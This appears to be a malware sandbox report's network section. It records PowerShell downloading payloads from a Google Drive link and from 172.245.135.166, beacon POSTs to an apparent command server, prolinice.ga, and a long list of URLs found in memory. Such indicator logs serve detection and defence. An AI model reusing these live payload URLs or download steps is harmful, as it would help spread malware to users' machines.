Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.135.166

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 1_2_03174BB0 URLDownloadToFileW,

1_2_03174BB0

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /600/seethebestthingsentiretimewithgreatthignstoebe.tIF HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 172.245.135.166Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /600/ERFCEE.txt HTTP/1.1Host: 172.245.135.166Connection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: prolinice.ga

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wvhejqgucymxstkj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: prolinice.ga

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 23 Oct 2024 06:15:42 GMTserver: Apache/2.4.59 (Debian)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 33 37 44 33 0d 0a 84 00 00 00 a0 5f e8 0a 27 e8 d3 d3 81 21 79 b3 53 e5 35 0b ec 13 ad 26 4d 93 dc e5 25 0a ed e2 44 4a 3b 47 a5 77 e3 2c 25 29 67 7b b4 1d 52 9a 46 7a 54 8c 7e 72 ec d5 7e f4 44 cf b3 6b eb a7 41 63 d4 4a be ec 6e e8 4b 42 15 65 fa 28 3b 12 b5 17 01 51 60 01 78 3a 91 7f 32 8b 47 78 ce d5 ea f0 7b d0 1e 45 fe 16 dc 84 fa d9 be 93 bd db 4a 1d 9f ac 79 dd 2f b5 84 79 6d 21 b3 90 51 dc c2 a5 14 5d bd 12 b6 4b 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 78 d7 7b c7 34 f8 40 a6 ce 9e 68 07 d1 3b db 70 67 ae de de 5f 1b 81 d3 b1 e8 be 06 9b bd 51 aa 40 d1 5b 4e 04 32 d7 97 2a e0 96 cc f3 08 be 06 f4 ef f1 48 d0 25 d9 73 3b 22 c7 0f b5 72 bf c3 e5 81 32 31 c9 f4 a1 4c ee 90 56 05 52 a9 1c 76 6f 99 dc ff 39 62 09 4e 0e 7c a8 50 2c 99 64 73 2c f8 8e 19 ec 5e 4c 2b 1b 6a 20 6d e3 2e 26 3e f2 ee 67 21 84 c5 3d 2f 72 90 3a ea 6c 5f b3 01 1d 55 2a 97 6b 1b 48 d7 18 d0 92 ef 20 3e 28 8e b6 b7 0f 4f c2 e3 41 ee a3 e2 e5 4f 7c 04 cf 84 8c 71 e5 91 3b ef 9c 40 2b b4 81 b3 6f 0c e5 ea f4 a9 02 25 53 be 6e 6e 71 ce db f8 20 6e 55 5b a4 66 26 ed 43 1b d2 35 1a 47 54 5d 20 0c 1b 03 8a 54 94 fb f1 d9 5d 91 01 a9 f6 90 b3 3e c6 10 cc 67 ca 7b 76 0b 97 06 5b d8 d2 e2 0f 79 af ed 1b 53 92 e1 e9 cc 7a b6 b9 98 42 38 a5 00 49 58 88 86 83 3c a1 5c d3 72 7d ad bc 8d 80 b4 ea 85 32 d9 b9 33 ce ae d5 90 f4 bb 3a c9 3d 3b 48 a7 e3 58 dd be d0 8a aa 01 3e 48 f4 19 2b 95 d5 65 ff b4 78 a1 d2 cd 69 0a 91 f7 6a 18 3d 4f 75 b1 bc 1b b1 60 c8 27 8c 70 db 33 0d a6 f2 ed 80 8d aa 7c 4a 8c 59 8c 3d 99 a9 52 09 0f d9 5e 58 eb 6f 11 c9 5b 23 0e a9 04 11 b7 a5 6b eb 6e 85 01 89 5e cf 54 06 96 02 2d c3 92 6c 61 40 ee 39 ff fa 3e 0d c6 24 8f 1c 02 ac 7a ab 13 d0 be a8 cb 90 7c 6b d5 fb ae 58 ee db 76 10 36 cb d3 c0 5d 0e e0 08 4f 38 94 52 92 70 bf 7c bd c4 0d 6f f9 74 7a 41 a6 59 ea 90 d6 8f 1b 32 75 08 c5 9a 2d a0 6a 8b fd 6b c4 c2 37 35 48 bd 8c 96 77 e4 62 45 8d 49 72 d0 11 c5 42 47 60 cf 79 cc d5 44 76 86 c6 57 e5 fc f1 b9 98 00 52 87 30 6d b6 64 39 d2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Wed, 23 Oct 2024 06:15:48 GMTserver: Apache/2.4.59 (Debian)content-length: 409content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 39 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 70 72 6f 6c 69 6e 69 63 65 2e 67 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>

Source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.135.166/600/seeth
Source: powershell.exe, 00000001.00000002.1442591521.0000000004D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF
Source: powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF1
Source: powershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFA
Source: powershell.exe, 00000001.00000002.1441509755.0000000002FCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIF_
Source: powershell.exe, 00000001.00000002.1451121837.0000000007518000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://172.245.135.166/600/seethebestthingsentiretimewithgreatthignstoebe.tIFt
Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.0000000009519000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: powershell.exe, 00000003.00000002.1326423654.0000000005779000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://go.micros
Source: powershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 0000000E.00000000.1754609723.000000000955E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1754609723.00000000094DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 0000000E.00000000.1749537667.000000000305D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2158540927.000000000305D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/
Source: explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/)
Source: explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/;
Source: explorer.exe, 00000013.00000002.2014590049.0000000002D4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1995400275.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1997904056.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2535368092.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2112839505.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2535747935.0000000002CF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2535507694.0000000000450000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2536095977.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2535527789.0000000000C09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.php
Source: explorer.exe, 00000013.00000002.2014590049.0000000002CD7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.1995400275.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.1997904056.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2535368092.0000000002D67000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.2112839505.0000000000BA9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.2535747935.0000000002CF7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001C.00000002.2535507694.0000000000450000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2536095977.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2535527789.0000000000C09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
Source: explorer.exe, 00000013.00000002.2014590049.0000000002D25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/ndex.php
Source: explorer.exe, 00000013.00000002.2014590049.0000000002D45000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://prolinice.ga/z
Source: explorer.exe, 0000000E.00000000.1749297588.0000000002C00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753289408.0000000007B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000E.00000000.1753243841.0000000007AF0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wvhejqgucymxstkj.com/
Source: explorer.exe, 0000000E.00000003.2161939139.0000000000978000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wvhejqgucymxstkj.com/application/x-ww
Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000000E.00000003.2159424837.00000000096A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1755609685.00000000095B9000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000003.00000002.1336183059.00000000086C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppin
Source: powershell.exe, 00000008.00000002.2180174511.0000000005299000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6LR
Source: powershell.exe, 00000001.00000002.1442591521.00000000049B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1326423654.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2180174511.00000000052AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000003.00000002.1326423654.0000000005196000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: explorer.exe, 0000000E.00000003.2162007420.000000000D1F9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/$
Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/X
Source: explorer.exe, 0000000E.00000002.2535055415.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1748502813.0000000000889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2158540927.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1749537667.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2160994269.0000000002FBF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000000E.00000000.1754609723.00000000093B4000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=C2BB6DDCE8D847D6B779FE8AEC27D161&timeOut=5000&oc
Source: explorer.exe, 0000000E.00000003.2158540927.0000000002FAD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1749537667.0000000002FA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000000E.00000000.1754609723.0000000009390000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comWzE
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1697699849.0000000000820000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1699464500.0000000000C20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004A01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.goo
Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Source: powershell.exe, 0000000A.00000002.1700233165.0000000004C56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 0000000A.00000002.1700233165.0000000004C6C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000004C70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000013.00000003.1990810221.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, 5BA1.tmp.19.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.comE
Source: powershell.exe, 0000000A.00000002.1700233165.0000000004B58000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1697699849.00000000008FD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1442591521.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15G9PH.img
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hJkDs.img
Source: explorer.exe, 0000000E.00000000.1751954020.0000000006F94000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: powershell.exe, 00000001.00000002.1451121837.0000000007451000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/
Source: powershell.exe, 00000001.00000002.1448623552.0000000005A1B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1328341542.00000000060AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1700233165.0000000005A69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 0000000E.00000003.2159660741.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000000.1761907243.000000000D1B6000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.comNaP0B
